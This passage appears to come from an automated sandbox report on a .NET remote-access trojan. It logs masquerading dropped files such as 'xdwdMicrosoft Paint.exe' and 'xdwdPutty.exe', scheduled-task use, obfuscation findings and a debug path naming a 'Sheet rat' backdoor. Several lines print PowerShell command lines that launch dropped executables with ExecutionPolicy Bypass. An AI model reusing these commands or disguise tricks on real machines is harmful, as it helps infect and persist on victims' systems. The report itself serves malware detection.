Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: wldp.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: mscoree.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: version.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: edgegdi.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: amsi.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: userenv.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: profapi.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: sxs.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: devenum.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: winmm.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: ntmarta.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: devobj.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: msasn1.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: msdmo.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: windows.storage.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: wldp.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: sspicli.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: wldp.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: mscoree.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: version.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: edgegdi.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: amsi.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: userenv.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: profapi.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: sxs.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: devenum.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: winmm.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: ntmarta.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: devobj.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: msasn1.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: msdmo.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: windows.storage.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: wldp.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: sspicli.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: secur32.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: ptKNiAaGus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: ptKNiAaGus.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Malware\Desktop\hack tool\Backdoor\Sheet rat v 2.2\Src\Plugins\SendFile\obj\Release\SendFile.pdb source: ptKNiAaGus.exe, 00000000.00000002.3335122785.000000001BAD0000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

barindex
.NET source code contains potential unpacker
Source: ptKNiAaGus.exe, WSBzhPoDCyO.cs.Net Code: DkrItwdZ
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, Packet.cs.Net Code: Read System.Reflection.Assembly.Load(byte[])
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, Packet.cs.Net Code: Read System.Reflection.Assembly.Load(byte[])
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, Packet.cs.Net Code: Read
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, gEjezvihrA.cs.Net Code: oRziWoOpFzwVe
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, gEjezvihrA.cs.Net Code: oRziWoOpFzwVe
Source: xdwdPutty.exe.33.dr, gEjezvihrA.cs.Net Code: oRziWoOpFzwVe
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"'
Source: ptKNiAaGus.exeStatic PE information: 0xF5FE416F [Wed Oct 13 03:20:15 2100 UTC]
Source: C:\Users\user\Desktop\ptKNiAaGus.exeCode function: 0_2_00007FFF60F500BD pushad ; iretd 0_2_00007FFF60F500C1
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeCode function: 17_2_00007FFF60F500BD pushad ; iretd 17_2_00007FFF60F500C1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeCode function: 19_2_00007FFF60F63928 push eax; retf 19_2_00007FFF60F63931
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeCode function: 19_2_00007FFF60F600BD pushad ; iretd 19_2_00007FFF60F600C1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeCode function: 19_2_00007FFF60F68780 push es; ret 19_2_00007FFF60F68C46
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeCode function: 19_2_00007FFF60F68780 push es; ret 19_2_00007FFF60F68C4E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeCode function: 33_2_00007FFF60F43928 push eax; retf 33_2_00007FFF60F43931
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeCode function: 33_2_00007FFF60F400BD pushad ; iretd 33_2_00007FFF60F400C1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeCode function: 33_2_00007FFF60F48780 push es; ret 33_2_00007FFF60F48C46
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeCode function: 33_2_00007FFF60F48780 push es; ret 33_2_00007FFF60F48C4E
Source: C:\Users\user\xdwdPutty.exeCode function: 36_2_00007FFF60F400BD pushad ; iretd 36_2_00007FFF60F400C1
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeCode function: 50_2_00007FFF60F200BD pushad ; iretd 50_2_00007FFF60F200C1
Source: C:\Users\user\xdwdPutty.exeCode function: 55_2_00007FFF60F500BD pushad ; iretd 55_2_00007FFF60F500C1
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeCode function: 64_2_00007FFF60F600BD pushad ; iretd 64_2_00007FFF60F600C1
Source: C:\Users\user\xdwdPutty.exeCode function: 78_2_00007FFF60F300BD pushad ; iretd 78_2_00007FFF60F300C1
Source: ptKNiAaGus.exe, BlZVXHIIaPbHfI.csHigh entropy of concatenated method names: 'tSODIOiBRDXJwkT', 'BJcsukRMTZ', 'wvIinJskLeX', 'eSjHRzyM', 'GAZxDPFJBCj', 'pmFJVkADAIldI', 'ZKcANVNApvikktn', 'KbnSpgexvOxJ', 'yPwpEqvgApO', 'oxKbkAHQZxJ'
Source: ptKNiAaGus.exe, ngXUOZCVh.csHigh entropy of concatenated method names: 'SugoyTPgJVvv', 'lWREblyMHEKGgdx', 'wVWJrmsraWSrMU', 'LsgmxwUakjPKpWh', 'qRtNAZmIzd', 'dESGAnJyOArz', 'bulabbDUsFcaSH', 'mFXmUWrWRcPWfXT', 'zSDlFnLhXa', 'kyqghgPL'
Source: ptKNiAaGus.exe, aTWRcRmMPAC.csHigh entropy of concatenated method names: 'YWlLHFrhEUxDwZo', 'QNksPVFxWLWn', 'tgWUvohOwiwNQU', 'VSUDcHvC', 'JhDRnoviDs', 'najBlHPTf', 'fzAzbEqTLgxeHK', 'kQaHmNJXJR', 'iTSVrcWadiCRMkE', 'sLMJTYnArp'
Source: ptKNiAaGus.exe, rEMvqXUYw.csHigh entropy of concatenated method names: 'KQdgoRhaxzvrrCD', 'ZwAejkTaYkz', 'eUlIvLBnLcIAl', 'ngMAMJrSyYXSO', 'xCHESzwdOmw', 'AQMxoAtxxnNYX', 'qLVNlcwcqIUDim', 'KSZEgJbFBkXZQc', 'ojhcIkHAB', 'kXaDckRHJm'
Source: ptKNiAaGus.exe, sXNNIwuBLyDCn.csHigh entropy of concatenated method names: 'KzETmFIz', 'HggOwIlWtJnS', 'fZytGkgFkIg', 'qyHrOJZtuG', 'chytZbKsAjkUf', 'syYTXXYzvGJ', 'efANZeZsWMIq', 'dZPgjFec', 'VKBZXiHdlsj', 'wermKFvmygqhNtx'
Source: ptKNiAaGus.exe, kiBrAzKlhwI.csHigh entropy of concatenated method names: '_003CScreenShot_003Eb__16_0', 'GFHyolqxTiPW', 'rTDCGOXiyndD', 'xofGmlAsdGWCitw', 'ABTeMIfH', 'ailvIRdutoBSM', 'eWmNMhAYVadxmKY', 'oIXXMDOwVpsHo', 'vmoFpIZv', 'aiBMLSKeSW'
Source: ptKNiAaGus.exe, FSmyfmyMutFI.csHigh entropy of concatenated method names: 'IHADBbEs', 'hQUjjodBxy', 'BVWSWKGm', 'NYnlEwRYEl', 'QmolVevCJjswHEE', 'lihqVSbCIdienW', 'xMDnOgkw', 'OEchVcghzJgpXv', 'yLlcsvQOndv', 'DRqGAlpbQpthg'
Source: ptKNiAaGus.exe, fJqINigGmUCZC.csHigh entropy of concatenated method names: 'QlbUeGpFUx', 'olCxFkzEoyLXkt', 'zFJGvZFLDjJBq', 'rZpsSZweJhjCU', 'TFNqauGkwN', 'QiZyOwjJ', 'xYVfRUnVvcX', 'FqsyVSbwaGdcqC', 'WfvlAswRujiZFG', 'pUpJKrhAsdHNw'
Source: ptKNiAaGus.exe, BsbXIFfqT.csHigh entropy of concatenated method names: '_003CStart_003Eb__1_0', '_003CUninstall_003Eb__2_0', '_003CLoopInstall_003Eb__7_0', '_003CStartAsBypass_003Eb__10_0', 'UAOIwMuBa', 'mRWRLoTV', 'FiZsYJBwGnrKc', 'UBMyoZKFhorUkV', 'MUlKKOcvH', 'yuQnOiuKZCPypf'
Source: ptKNiAaGus.exe, nOmJeajqakZQx.csHigh entropy of concatenated method names: 'VMDOPKelokaHLzt', 'kzXYTmdFAApojK', 'zFhHDuDSU', 'CZBjWOjw', 'zZsZeiiyNOUpB', 'baBdspyhhCSR', 'bVdlGrCKk', 'gCYVvpDA', 'AvaJVkrHiS', 'qGMVHcjcOxyTrU'
Source: ptKNiAaGus.exe, vJbYblzYrfoB.csHigh entropy of concatenated method names: 'gFWqIJotzNwvM', 'pfdyvOpMWAXN', 'tmLjgQlSNFQ', 'MEkwwfdOG', 'sNgsnsTiV', 'ulvGndQeaNb', 'NpjJFQaUuyS', 'tyCnctyfkwPbJ', 'ISPyothTzrJe', 'CIAZvTLNpbcChO'
Source: ptKNiAaGus.exe, AFDAeWnBGIKu.csHigh entropy of concatenated method names: 'oDwpjjxTMPM', 'PUGJgxszPRRk', 'VAcvknCno', 'JWXeSLLnqrXP', 'hrZLRvHW', 'MfOjUXcbJpaqw', 'ITaoEdbtnGyvDK', 'kshHYJsPjqnK', 'hhoKkDRrrG', 'tJSsIlZU'
Source: ptKNiAaGus.exe, WBkUEsbhmZeNIv.csHigh entropy of concatenated method names: 'SoSyVSXfCVs', 'XTskBgXiTfIyZBX', 'UgSMOJxLAaoY', 'WiyMvDNtpchkMCn', 'UZUvtLVCfiNW', 'jbsykxwJldxJk', 'DlbCGKfgATdE', 'MwgMprLGB', 'lcEqWivWlJgSRD', 'GLCCaYVfmkNF'
Source: ptKNiAaGus.exe, ctLKvSYSpZJt.csHigh entropy of concatenated method names: 'juxIMOhpgo', 'RdVUgDBImozuSxE', 'gPXRhKdsjiHcVG', 'vENtRwDmmXBHbk', 'fKIaAaIX', 'HAdkywZmfA', 'pFEmsddl', 'gCBHjCwUvGNmhw', 'RSTnqyPcagKZG', 'hXwXekEyVBv'
Source: ptKNiAaGus.exe, ixSNFcnAZd.csHigh entropy of concatenated method names: 'yFrqudjmVPGe', 'JkHgNblQEtPkoGd', 'UmYjXsTLRQXsFez', 'TUDUVGmysNtM', 'FGXGoBdivZQR', 'PxDsLatoRUCIcNz', 'qKzGjLKzlQd', 'sXunDYrpvAB', 'TnolVxMndI', 'PRKNDnDH'
Source: ptKNiAaGus.exe, TJFZgosWeymV.csHigh entropy of concatenated method names: 'gSupzYBgpZPN', 'IKqmTgAuQrpwBf', 'nGhYugYGHy', 'URudkqMsgigseFV', 'PbFtyslsjrqSH', 'EjoZMiAmGzjJz', 'HODTYxJeCFwbg', 'utAulwew', 'FtnjcVFJ', 'tEkVoXtKaZgjdk'
Source: ptKNiAaGus.exe, EzwqebyGv.csHigh entropy of concatenated method names: '_003CPatchMem_003Eb__0', 'XvhDVIDTsz', 'FblPzXsORRWA', 'JozepQtc', 'apucNvwVuq', 'jyYLbeDFsew', 'vethIZdb', 'zpAwVWKx', 'vXfbTLPoDL', 'okmdoyxTOn'
Source: ptKNiAaGus.exe, ncSubYLaTjDxEKi.csHigh entropy of concatenated method names: 'HDWwlYrbKQdNSsA', 'esngNPlUUlpm', 'hZZcJBbDb', 'PkqkKvxIa', 'ZSMWBisRCbAjF', 'crElIqYaDj', 'wXebZXdPCkO', 'CaaJJAzIff', 'HSrMzkKyPcy', 'LNpcEWUC'
Source: ptKNiAaGus.exe, WSBzhPoDCyO.csHigh entropy of concatenated method names: 'zIwxKQJLlKR', 'qABCbysjh', 'zBiSdHrPVoqvwo', 'hjTaakMApIh', 'lbEFfpGJvP', 'mCUVodUuDMfuPZ', 'HInAsKwtF', 'RiLGpfbSrhYGOX', 'VNeBGhpfWiy', 'uWhqIOhXuJo'
Source: ptKNiAaGus.exe, YdxQPCPenRPlm.csHigh entropy of concatenated method names: 'OxDjszrRWVWVc', 'dsDylpVj', 'yDTeALhtU', 'ITqcXHToHG', 'tuaIAuNQzwPf', 'EgZVrFobCHTnnQ', 'qSANchFJsVzQ', 'dURtnDXriyx', 'RArmGVNe', 'ZhvBDFzXgzroU'
Source: ptKNiAaGus.exe, UfMnWsvflYsaAsK.csHigh entropy of concatenated method names: 'cSvGSUoqZkIU', 'bDaXGzsPHOnjQl', 'wNlgcmunuLdArVN', 'kboKUSDusSOUE', 'WBiutLybr', 'gQfLczAt', 'bDIbbZeKroKYajm', 'cRxbCoIjkdDmrS', 'RUacEOZHUPBGnh', 'GhsWzhCRrmuY'
Source: ptKNiAaGus.exe, LyYGZtBCXfhLta.csHigh entropy of concatenated method names: 'CegapNQcJfAJ', 'AHNZNTemugjcDX', 'vdREkUzXp', 'CcvVObYkKCPSHxa', 'oIxwxlqEggNwYWA', 'YdKqiQfFKstUw', 'WUdnfrZszRmr', 'iNcLoBfudmjOYc', 'mFsVHCJtSkqJLf', 'tDqbwrigESQj'
Source: ptKNiAaGus.exe, LgUPyuNhoLG.csHigh entropy of concatenated method names: 'qASorupmplRQ', 'CDYUXuDrC', 'qcrJhNQjBoYVi', 'HcVZjhZODFwrpM', 'QDmoSbLzkI', 'ZCPcmgViMvY', 'IVIbZmNpXDSk', 'lhPNwclQJHXzb', 'PWGzVsYeSK', 'mMWSBVjf'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, YeASamleCu.csHigh entropy of concatenated method names: 'xnIxVRYrPBFYu', 'bdMoOrQxtvgEAC', 'aaKjZcdK', 'koKrGQSFGdzIY', 'oCRzuMRRQWnpbv', 'VNyTdDahZrdday', 'DvBkWgHcjxR', 'XnDRpWQkPBp', 'nNVsIQjrStTsoqZ', 'OkOVMjCtV'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, BepYSwIiYsKTkc.csHigh entropy of concatenated method names: '_003CScreenShot_003Eb__16_0', 'hgYqlsJf', 'sLrZOuAb', 'kOWJOWvoQlcxdqy', 'DFyYevrypfGFjUe', 'iYAOjYSCuxcYDC', 'VsaLoCDQoW', 'UiPqEvHkOEq', 'PenvdgTTvmQlM', 'JppfHLrLD'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, gEjezvihrA.csHigh entropy of concatenated method names: 'SNPMxFexzSMQ', 'gDOlHAunu', 'YzPPDudfl', 'vNRfanEABU', 'TnWxvgwZqFpXCrN', 'paCVmbxQTmjLT', 'umZLELsRHOgGvNG', 'PnNGOazzMspGeJ', 'lGuLDxqnBpYTnog', 'kKdWwyNhUmay'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, WkKaRrezv.csHigh entropy of concatenated method names: 'VsYjwdcp', 'jAGsauzxlaBtYm', 'uBIfrUJxdEg', 'ROggXEKEH', 'skfRutZuJx', 'ypvVxxTaC', 'nujiiFtdoNhS', 'JYzaaPYjvjES', 'kLZHreEmFpw', 'LofQUjZgLlxyX'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, xeRJPXmwavvZh.csHigh entropy of concatenated method names: 'VuqpJUTheDe', 'znrPvdHAVP', 'cAyIiGOFzkOT', 'HOUaRQzOf', 'XzFKzRRgBGUNoLM', 'bQxfglThIhJhj', 'PMxBaJdw', 'niDNNpuaJN', 'ojQARmfXCSIjw', 'qIPmkDHfCJxdXGs'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, rZjCSSmKXaUqXO.csHigh entropy of concatenated method names: 'dlETBnKBmzDv', 'qxyyxYISrIfceYU', 'mEonbfpiuJAgXx', 'OXrTZcVt', 'FJldZrWPqJAuPIT', 'HQDnXcvuE', 'FmEuQQLohR', 'MIDmlqOxJzPYIRM', 'FbdOrYJmkK', 'tjiaaBSvHzAmmhx'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, KaCEkWzArz.csHigh entropy of concatenated method names: 'TRJrolTMln', 'tonIFMNIZBwi', 'MKXzNLdyFCKiXye', 'BucahgNQbRnniZ', 'XiNfeOUyZ', 'eolcahOiV', 'HTIOfxGXwYq', 'frnzKTAYhv', 'QDsboAkZ', 'NADDayzg'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, vzOQfCjdwrwlD.csHigh entropy of concatenated method names: 'DZSBOsEdSkftm', 'CHkhhdMlBNYW', 'xQXiDVjowcoBI', 'RgdllPHbpHPD', 'XRYFcrMHNvC', 'XCoFfwgZxuFX', 'mGZVbPTAvMWX', 'LJwYElbJOMT', 'KKieccLBcpl', 'llfibbqRhIkXd'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, wgtJFxwmDCkn.csHigh entropy of concatenated method names: 'bqEIfXfZOiYonfU', 'nuaTxiBEdpUSV', 'ZXsCuXbSrjW', 'hyVVRScD', 'HJTAtpzfpD', 'DpIBwllwHV', 'rxtACjIY', 'pRIRNYBA', 'bnBgIzrpUYfgf', 'uESWGsmQWRAXmhq'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, WfcSxBiJWHQqTp.csHigh entropy of concatenated method names: 'PROyGYfLwtjlP', 'HShuatetG', 'uCbiJigZKDT', 'HxqQqUgYOQSyPoi', 'swEWKuEExwBNNJa', 'rILkEKCKM', 'FdjcSVAkgOzxn', 'tlSuSTLEq', 'HGdyrituJ', 'paUVdgNdcLMt'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, LtuDkZEKFIyjL.csHigh entropy of concatenated method names: 'zIEsmyYznoUPjWT', 'ZPaJmzDKLHfp', 'hMOQgSAS', 'UGOLGFiVphrci', 'IBJAEtgeTivGc', 'yDDSKovU', 'atycqSyybydGPWS', 'YEpnfQzccXmdYRu', 'nGjHGRqMUjTIyy', 'gkXmjFhPKtVzT'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, uBecUVPQ.csHigh entropy of concatenated method names: '_003CStart_003Eb__1_0', '_003CUninstall_003Eb__2_0', '_003CLoopInstall_003Eb__7_0', '_003CStartAsBypass_003Eb__10_0', 'AaqmPntZxR', 'BYucXNJtAttu', 'fCgVMnQqp', 'jZNmaLjR', 'jSzWGBFGMVP', 'GfeHMHXNKBq'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, rTbUtmWcnO.csHigh entropy of concatenated method names: 'ETuZUDsFHdsPqem', 'WQoYDPhzWL', 'NHsdoETuthXISt', 'YkyElqHXzL', 'pvomvDJNfyOzEKW', 'thzIVfnqxASaz', 'ktSpPYGH', 'UzFORJkutOGOq', 'DcKHyouk', 'NZOVhOvydlufJ'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, kICtJPxSafoGvi.csHigh entropy of concatenated method names: 'izoVMEnyZoDuo', 'ZzsriRjjE', 'MObKRbqhKZYMlY', 'mxKcEGVJI', 'gvPMQxzu', 'JxcchyxVkPlMOTi', 'UZGAjqFTJlfbVtb', 'SmPKJUcdGkl', 'WoRcgQwXstPSrJT', 'TWAqnMubEYmzwdu'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, bNrRgbuKfhLKh.csHigh entropy of concatenated method names: 'dcgBjalp', 'QTRdGVQS', 'MNYAcNFsv', 'ngqakeeDYY', 'XzmIbxPynoOP', 'xUecATvq', 'TBYZthybSsue', 'OmrAPqtHdZRpcP', 'BCEcosfkkBEizMW', 'UWIGslzDFxX'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, KPKTbmek.csHigh entropy of concatenated method names: 'ywDpYFYr', 'iSYaQgfunkCfdU', 'LGzzzbmHVN', 'sIvgJerM', 'udjzdohzui', 'UcoeSGZrOwK', 'MKoWyGaX', 'RCUiWzWLunNnrk', 'UROCFzyVjZ', 'opRisTKhDaT'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, YeASamleCu.csHigh entropy of concatenated method names: 'xnIxVRYrPBFYu', 'bdMoOrQxtvgEAC', 'aaKjZcdK', 'koKrGQSFGdzIY', 'oCRzuMRRQWnpbv', 'VNyTdDahZrdday', 'DvBkWgHcjxR', 'XnDRpWQkPBp', 'nNVsIQjrStTsoqZ', 'OkOVMjCtV'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, BepYSwIiYsKTkc.csHigh entropy of concatenated method names: '_003CScreenShot_003Eb__16_0', 'hgYqlsJf', 'sLrZOuAb', 'kOWJOWvoQlcxdqy', 'DFyYevrypfGFjUe', 'iYAOjYSCuxcYDC', 'VsaLoCDQoW', 'UiPqEvHkOEq', 'PenvdgTTvmQlM', 'JppfHLrLD'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, gEjezvihrA.csHigh entropy of concatenated method names: 'SNPMxFexzSMQ', 'gDOlHAunu', 'YzPPDudfl', 'vNRfanEABU', 'TnWxvgwZqFpXCrN', 'paCVmbxQTmjLT', 'umZLELsRHOgGvNG', 'PnNGOazzMspGeJ', 'lGuLDxqnBpYTnog', 'kKdWwyNhUmay'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, WkKaRrezv.csHigh entropy of concatenated method names: 'VsYjwdcp', 'jAGsauzxlaBtYm', 'uBIfrUJxdEg', 'ROggXEKEH', 'skfRutZuJx', 'ypvVxxTaC', 'nujiiFtdoNhS', 'JYzaaPYjvjES', 'kLZHreEmFpw', 'LofQUjZgLlxyX'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, xeRJPXmwavvZh.csHigh entropy of concatenated method names: 'VuqpJUTheDe', 'znrPvdHAVP', 'cAyIiGOFzkOT', 'HOUaRQzOf', 'XzFKzRRgBGUNoLM', 'bQxfglThIhJhj', 'PMxBaJdw', 'niDNNpuaJN', 'ojQARmfXCSIjw', 'qIPmkDHfCJxdXGs'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, rZjCSSmKXaUqXO.csHigh entropy of concatenated method names: 'dlETBnKBmzDv', 'qxyyxYISrIfceYU', 'mEonbfpiuJAgXx', 'OXrTZcVt', 'FJldZrWPqJAuPIT', 'HQDnXcvuE', 'FmEuQQLohR', 'MIDmlqOxJzPYIRM', 'FbdOrYJmkK', 'tjiaaBSvHzAmmhx'
